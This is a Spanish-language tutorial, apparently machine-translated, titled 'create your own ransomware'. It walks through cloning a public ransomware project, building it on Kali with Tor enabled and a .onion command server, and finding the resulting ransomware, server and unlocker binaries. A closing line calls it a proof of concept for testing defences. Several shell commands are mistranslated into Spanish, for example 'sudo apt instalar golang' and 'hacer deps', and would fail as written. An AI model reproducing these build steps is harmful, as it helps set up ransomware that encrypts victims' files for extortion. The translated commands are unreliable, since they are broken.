# Ransomware: cree su propio ransomware

- [Ransomware: cree su propio ransomware](#ransomware-cree-su-propio-ransomware)
  - [Paso 1 : Descargue e instale los binarios](#paso-1--descargue-e-instale-los-binarios)
  - [Paso 2 : Exportar variables de entorno GO](#paso-2--exportar-variables-de-entorno-go)
  - [Paso 3 : Hacer dependencias del código fuente](#paso-3--hacer-dependencias-del-código-fuente)
  - [Paso #4 : Crea el código fuente con opciones](#paso-4--crea-el-código-fuente-con-opciones)
  - [Paso 5 : Verifique el directorio en busca de ransomware.exe](#paso-5--verifique-el-directorio-en-busca-de-ransomwareexe)
  - [Paso 6 : Examine los tipos de archivos que se cifrarán](#paso-6--examine-los-tipos-de-archivos-que-se-cifrarán)
  - [Resumen](#resumen)

## Paso 1 : Descargue e instale los binarios

El primer paso es encender tu Kali y asegurarte de que golang esté instalado.
Si no, descárgalo de los repositorios de Kali ingresando;

> kali > sudo apt instalar golang

A continuación, deberá iniciar sesión como usuario root.

> kali > sudo su -

Ahora crea un directorio para los binarios.
En este caso, lo llamé simplemente "git".

> kali > mkdir git

A continuación, cambie el directorio (cd) a este directorio.

> kali > cd git

A continuación, descargue los binarios de github.com (<https://github.com/mauri870/ransomware?tab=readme-ov-file>).

> kali > git clon <https://github.com/mauri870/ransomware>

## Paso 2 : Exportar variables de entorno GO

A continuación, necesitamos configurar algunas variables de entorno para dirigir los binarios e IR a los directorios apropiados.

## Paso 3 : Hacer dependencias del código fuente

Ahora, con las variables configuradas y exportadas, necesitamos crear las dependencias. Navegue hasta el nuevo directorio, ransomware, e ingrese *make deps*.

> kali > cd ransomware
> kali > hacer deps

## Paso #4 : Crea el código fuente con opciones

Ahora que hemos completado la creación de los departamentos, podemos comenzar a crear el código fuente. En nuestro caso, usaremos algunas opciones.

Primero, queremos utilizar ToR para cifrar nuestras comunicaciones a través de la red ToR.

> USE_TOR=verdadero

En segundo lugar, queremos usar nuestro servidor web oscuro en *hackersarisegtdj.onion* (puede usar cualquier dominio o localhost).

> SERVER_HOST=hackersarisegtdj.onion

En tercer lugar, queremos utilizar el puerto 80 (puede utilizar cualquier puerto).

> SERVIDOR_PORT=80

Finalmente, queremos configurar el sistema operativo para que compile el código fuente de nuestro sistema operativo, en este caso, Linux.

> GOOS=linux

Nuestro comando debería verse así;

> kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux

Ahora presione ENTER y observe cómo se compila su *ransomware*.

## Paso 5 : Verifique el directorio en busca de ransomware.exe

Una vez que se haya generado el código fuente, haga una lista larga en el directorio de ransomware.

> kali > ls -l

Ahora, navegue hasta el directorio *bin*.

> kali > bandeja de cd

Aquí verá el ransomware.exe, el servidor y unlocker.exe.

[Ransomware](ransomware_img.png)

## Paso 6 : Examine los tipos de archivos que se cifrarán

Si desea ver qué tipos de archivos cifrará este ransomware, navegue hasta el directorio cmd y abra *common.go*

> kali > cd cmd
> kali > más común.go

Aquí puede ver las extensiones de archivo que este ransomware cifrará cuando se ejecute.

## Resumen

El ransomware es probablemente la mayor amenaza para nuestros sistemas digitales en este momento. Como demostró claramente el ataque a Colonial Pipeline, casi todo el mundo es vulnerable y si los sistemas SCADA/ICS se ven comprometidos, puede haber importantes ramificaciones económicas y de infraestructura.

Esta POC de ransomware lo ayudará a comprender mejor el ransomware como una amenaza y a probar si sus sistemas son vulnerables a dicho ataque.
